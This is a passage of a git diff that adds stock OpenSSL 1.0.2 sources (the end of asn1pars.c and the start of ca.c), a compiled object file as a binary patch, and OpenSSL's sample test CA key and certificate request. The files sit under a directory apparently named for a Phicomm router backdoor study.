+            genconf = *(++argv);
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] <infile\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg   input format - one of DER PEM\n");
+        BIO_printf(bio_err, " -in arg       input file\n");
+        BIO_printf(bio_err,
+                   " -out arg      output file (output format is always DER\n");
+        BIO_printf(bio_err, " -noout arg    don't produce any output\n");
+        BIO_printf(bio_err, " -offset arg   offset into file\n");
+        BIO_printf(bio_err, " -length arg   length of section in file\n");
+        BIO_printf(bio_err, " -i            indent entries\n");
+        BIO_printf(bio_err, " -dump         dump unknown data in hex form\n");
+        BIO_printf(bio_err,
+                   " -dlimit arg   dump the first arg bytes of unknown data in hex form\n");
+        BIO_printf(bio_err, " -oid file     file of extra oid definitions\n");
+        BIO_printf(bio_err, " -strparse offset\n");
+        BIO_printf(bio_err,
+                   "               a series of these can be used to 'dig' into multiple\n");
+        BIO_printf(bio_err, "               ASN1 blob wrappings\n");
+        BIO_printf(bio_err,
+                   " -genstr str   string to generate ASN1 structure from\n");
+        BIO_printf(bio_err,
+                   " -genconf file file to generate ASN1 structure from\n");
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    BIO_set_fp(out, stdout, BIO_NOCLOSE | BIO_FP_TEXT);
+#ifdef OPENSSL_SYS_VMS
+    {
+        BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+        out = BIO_push(tmpbio, out);
+    }
+#endif
+
+    if (oidfile != NULL) {
+        if (BIO_read_filename(in, oidfile) <= 0) {
+            BIO_printf(bio_err, "problems opening %s\n", oidfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        OBJ_create_objects(in);
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+
+    if (derfile) {
+        if (!(derout = BIO_new_file(derfile, "wb"))) {
+            BIO_printf(bio_err, "problems opening %s\n", derfile);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if ((buf = BUF_MEM_new()) == NULL)
+        goto end;
+    if (!BUF_MEM_grow(buf, BUFSIZ * 8))
+        goto end;               /* Pre-allocate :-) */
+
+    if (genstr || genconf) {
+        num = do_generate(bio_err, genstr, genconf, buf);
+        if (num < 0) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    else {
+
+        if (informat == FORMAT_PEM) {
+            BIO *tmp;
+
+            if ((b64 = BIO_new(BIO_f_base64())) == NULL)
+                goto end;
+            BIO_push(b64, in);
+            tmp = in;
+            in = b64;
+            b64 = tmp;
+        }
+
+        num = 0;
+        for (;;) {
+            if (!BUF_MEM_grow(buf, (int)num + BUFSIZ))
+                goto end;
+            i = BIO_read(in, &(buf->data[num]), BUFSIZ);
+            if (i <= 0)
+                break;
+            num += i;
+        }
+    }
+    str = buf->data;
+
+    /* If any structs to parse go through in sequence */
+
+    if (sk_OPENSSL_STRING_num(osk)) {
+        tmpbuf = (unsigned char *)str;
+        tmplen = num;
+        for (i = 0; i < sk_OPENSSL_STRING_num(osk); i++) {
+            ASN1_TYPE *atmp;
+            int typ;
+            j = atoi(sk_OPENSSL_STRING_value(osk, i));
+            if (j == 0) {
+                BIO_printf(bio_err, "'%s' is an invalid number\n",
+                           sk_OPENSSL_STRING_value(osk, i));
+                continue;
+            }
+            tmpbuf += j;
+            tmplen -= j;
+            atmp = at;
+            ctmpbuf = tmpbuf;
+            at = d2i_ASN1_TYPE(NULL, &ctmpbuf, tmplen);
+            ASN1_TYPE_free(atmp);
+            if (!at) {
+                BIO_printf(bio_err, "Error parsing structure\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+            typ = ASN1_TYPE_get(at);
+            if ((typ == V_ASN1_OBJECT)
+                || (typ == V_ASN1_NULL)) {
+                BIO_printf(bio_err, "Can't parse %s type\n",
+                           typ == V_ASN1_NULL ? "NULL" : "OBJECT");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+            /* hmm... this is a little evil but it works */
+            tmpbuf = at->value.asn1_string->data;
+            tmplen = at->value.asn1_string->length;
+        }
+        str = (char *)tmpbuf;
+        num = tmplen;
+    }
+
+    if (offset >= num) {
+        BIO_printf(bio_err, "Error: offset too large\n");
+        goto end;
+    }
+
+    num -= offset;
+
+    if ((length == 0) || ((long)length > num))
+        length = (unsigned int)num;
+    if (derout) {
+        if (BIO_write(derout, str + offset, length) != (int)length) {
+            BIO_printf(bio_err, "Error writing output\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    if (!noout &&
+        !ASN1_parse_dump(out, (unsigned char *)&(str[offset]), length,
+                         indent, dump)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    ret = 0;
+ end:
+    BIO_free(derout);
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (b64 != NULL)
+        BIO_free(b64);
+    if (ret != 0)
+        ERR_print_errors(bio_err);
+    if (buf != NULL)
+        BUF_MEM_free(buf);
+    if (at != NULL)
+        ASN1_TYPE_free(at);
+    if (osk != NULL)
+        sk_OPENSSL_STRING_free(osk);
+    OBJ_cleanup();
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static int do_generate(BIO *bio, char *genstr, char *genconf, BUF_MEM *buf)
+{
+    CONF *cnf = NULL;
+    int len;
+    long errline;
+    unsigned char *p;
+    ASN1_TYPE *atyp = NULL;
+
+    if (genconf) {
+        cnf = NCONF_new(NULL);
+        if (!NCONF_load(cnf, genconf, &errline))
+            goto conferr;
+        if (!genstr)
+            genstr = NCONF_get_string(cnf, "default", "asn1");
+        if (!genstr) {
+            BIO_printf(bio, "Can't find 'asn1' in '%s'\n", genconf);
+            goto err;
+        }
+    }
+
+    atyp = ASN1_generate_nconf(genstr, cnf);
+    NCONF_free(cnf);
+    cnf = NULL;
+
+    if (!atyp)
+        return -1;
+
+    len = i2d_ASN1_TYPE(atyp, NULL);
+
+    if (len <= 0)
+        goto err;
+
+    if (!BUF_MEM_grow(buf, len))
+        goto err;
+
+    p = (unsigned char *)buf->data;
+
+    i2d_ASN1_TYPE(atyp, &p);
+
+    ASN1_TYPE_free(atyp);
+    return len;
+
+ conferr:
+
+    if (errline > 0)
+        BIO_printf(bio, "Error on line %ld of config file '%s'\n",
+                   errline, genconf);
+    else
+        BIO_printf(bio, "Error loading config file '%s'\n", genconf);
+
+ err:
+    NCONF_free(cnf);
+    ASN1_TYPE_free(atyp);
+
+    return -1;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/asn1pars.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/asn1pars.o
new file mode 100644
index 0000000000000000000000000000000000000000..d49bdd3e445376e96275769c19b65bec9b696c96
GIT binary patch
literal 13168
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-cert.srl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-cert.srl
new file mode 100644
index 0000000..2c7456e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-cert.srl
@@ -0,0 +1 @@
+07
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-key.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-key.pem
new file mode 100644
index 0000000..3a520b2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-key.pem
@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQCju6PLddelT+nIMm07GQwmYa/eZ2JWbsmt2gotSCqM7asFp425
+gxSK4jqhhT62UPpqDBEwvQ+fYkVv3RV0r9ReuZGv12NoS4fXsQgqO17lHA7Od0Kd
+2yNwJjKh44MxPKDt2o8iQMyZE0zlHnEFNpsP4COLTDNC6ljEEu5bk8uPsQIDAQAB
+AoGAVZmpFZsDZfr0l2S9tLLwpjRWNOlKATQkno6q2WesT0eGLQufTciY+c8ypfU6
+hyio8r5iUl/VhhdjhAtKx1mRpiotftHo/eYf8rtsrnprOnWG0bWjLjtIoMbcxGn2
+J3bN6LJmbJMjDs0eJ3KnTu646F3nDUw2oGAwmpzKXA1KAP0CQQDRvQhxk2D3Pehs
+HvG665u2pB5ipYQngEFlZO7RHJZzJOZEWSLuuMqaF/7pTfA5jiBvWqCgJeCRRInL
+21ru4dlPAkEAx9jj7BgKn5TYnMoBSSe0afjsV9oApVpN1Nacb1YDtCwy+scp3++s
+nFxlv98wxIlSdpwMUn+AUWfjiWR7Tu/G/wJBAJ/KjwZIrFVxewP0x2ILYsTRYLzz
+MS4PDsO7FB+I0i7DbBOifXS2oNSpd3I0CNMwrxFnUHzynpbOStVfN3ZL5w0CQQCa
+pwFahxBRhkJKsxhjoFJBX9yl75JoY4Wvm5Tbo9ih6UJaRx3kqfkN14L2BKYcsZgb
+KY9vmDOYy6iNfjDeWTfJAkBkfPUb8oTJ/nSP5zN6sqGxSY4krc4xLxpRmxoJ8HL2
+XfhqXkTzbU13RX9JJ/NZ8vQN9Vm2NhxRGJocQkmcdVtJ
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-req.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-req.pem
new file mode 100644
index 0000000..77bf7ec
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca-req.pem
@@ -0,0 +1,11 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBmTCCAQICAQAwWzELMAkGA1UEBhMCQVUxEzARBgNVBAgTClF1ZWVuc2xhbmQx
+GjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMRswGQYDVQQDExJUZXN0IENBICgx
+MDI0IGJpdCkwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKO7o8t116VP6cgy
+bTsZDCZhr95nYlZuya3aCi1IKoztqwWnjbmDFIriOqGFPrZQ+moMETC9D59iRW/d
+FXSv1F65ka/XY2hLh9exCCo7XuUcDs53Qp3bI3AmMqHjgzE8oO3ajyJAzJkTTOUe
+cQU2mw/gI4tMM0LqWMQS7luTy4+xAgMBAAEwDQYJKoZIhvcNAQEEBQADgYEAKlk7
+cxu9gCJN3/iQFyJXQ6YphaiQAT5VBXTx9ftRrQIjA3vxlDzPWGDy+V5Tqa7h8PtR
+5Bn00JShII2zf0hjyjKils6x/UkWmjEiwSiFp4hR70iE8XwSNEHY2P6j6nQEIpgW
+kbfgmmUqk7dl2V+ossTJ80B8SBpEhrn81V/cHxA=
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca.c
new file mode 100644
index 0000000..f0a19cf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ca.c
@@ -0,0 +1,2903 @@
+/* apps/ca.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* The PPKI stuff has been donated by Jeff Barber <jeffb@issl.atl.hp.com> */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <sys/types.h>
+#include <openssl/conf.h>
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/bn.h>
+#include <openssl/txt_db.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/objects.h>
+#include <openssl/ocsp.h>
+#include <openssl/pem.h>
+
+#ifndef W_OK
+# ifdef OPENSSL_SYS_VMS
+#  if defined(__DECC)
+#   include <unistd.h>
+#  else
+#   include <unixlib.h>
+#  endif
+# elif !defined(OPENSSL_SYS_VXWORKS) && !defined(OPENSSL_SYS_WINDOWS) && !defined(OPENSSL_SYS_NETWARE)
+#  include <sys/file.h>
+# endif
+#endif
+
+#include "apps.h"
+
+#ifndef W_OK
+# define F_OK 0
+# define X_OK 1
+# define W_OK 2
+# define R_OK 4
+#endif
+
+#undef PROG
+#define PROG ca_main
+
+#define BASE_SECTION    "ca"
+#define CONFIG_FILE "openssl.cnf"
+
+#define ENV_DEFAULT_CA          "default_ca"
+
+#define STRING_MASK     "string_mask"
+#define UTF8_IN                 "utf8"
+
+#define ENV_DIR                 "dir"
+#define ENV_CERTS               "certs"
+#define ENV_CRL_DIR             "crl_dir"
+#define ENV_CA_DB               "CA_DB"
+#define ENV_NEW_CERTS_DIR       "new_certs_dir"
+#define ENV_CERTIFICATE         "certificate"
+#define ENV_SERIAL              "serial"
+#define ENV_CRLNUMBER           "crlnumber"
+#define ENV_CRL                 "crl"
+#define ENV_PRIVATE_KEY         "private_key"
+#define ENV_RANDFILE            "RANDFILE"
+#define ENV_DEFAULT_DAYS        "default_days"
+#define ENV_DEFAULT_STARTDATE   "default_startdate"
+#define ENV_DEFAULT_ENDDATE     "default_enddate"
+#define ENV_DEFAULT_CRL_DAYS    "default_crl_days"
+#define ENV_DEFAULT_CRL_HOURS   "default_crl_hours"
+#define ENV_DEFAULT_MD          "default_md"
+#define ENV_DEFAULT_EMAIL_DN    "email_in_dn"
+#define ENV_PRESERVE            "preserve"
+#define ENV_POLICY              "policy"
+#define ENV_EXTENSIONS          "x509_extensions"
+#define ENV_CRLEXT              "crl_extensions"
+#define ENV_MSIE_HACK           "msie_hack"
+#define ENV_NAMEOPT             "name_opt"
+#define ENV_CERTOPT             "cert_opt"
+#define ENV_EXTCOPY             "copy_extensions"
+#define ENV_UNIQUE_SUBJECT      "unique_subject"
+
+#define ENV_DATABASE            "database"
+
+/* Additional revocation information types */
+
+#define REV_NONE                0 /* No addditional information */
+#define REV_CRL_REASON          1 /* Value is CRL reason code */
+#define REV_HOLD                2 /* Value is hold instruction */
+#define REV_KEY_COMPROMISE      3 /* Value is cert key compromise time */
+#define REV_CA_COMPROMISE       4 /* Value is CA key compromise time */
+
+static const char *ca_usage[] = {
+    "usage: ca args\n",
+    "\n",
+    " -verbose        - Talk alot while doing things\n",
+    " -config file    - A config file\n",
+    " -name arg       - The particular CA definition to use\n",
+    " -gencrl         - Generate a new CRL\n",
+    " -crldays days   - Days is when the next CRL is due\n",
+    " -crlhours hours - Hours is when the next CRL is due\n",
+    " -startdate YYMMDDHHMMSSZ  - certificate validity notBefore\n",
+    " -enddate YYMMDDHHMMSSZ    - certificate validity notAfter (overrides -days)\n",
+    " -days arg       - number of days to certify the certificate for\n",
+    " -md arg         - md to use, one of md2, md5, sha or sha1\n",
+    " -policy arg     - The CA 'policy' to support\n",
+    " -keyfile arg    - private key file\n",
+    " -keyform arg    - private key file format (PEM or ENGINE)\n",
+    " -key arg        - key to decode the private key if it is encrypted\n",
+    " -cert file      - The CA certificate\n",
+    " -selfsign       - sign a certificate with the key associated with it\n",
+    " -in file        - The input PEM encoded certificate request(s)\n",
+    " -out file       - Where to put the output file(s)\n",
+    " -outdir dir     - Where to put output certificates\n",
+    " -infiles ....   - The last argument, requests to process\n",
+    " -spkac file     - File contains DN and signed public key and challenge\n",
+    " -ss_cert file   - File contains a self signed cert to sign\n",
+    " -preserveDN     - Don't re-order the DN\n",
+    " -noemailDN      - Don't add the EMAIL field into certificate' subject\n",
+    " -batch          - Don't ask questions\n",
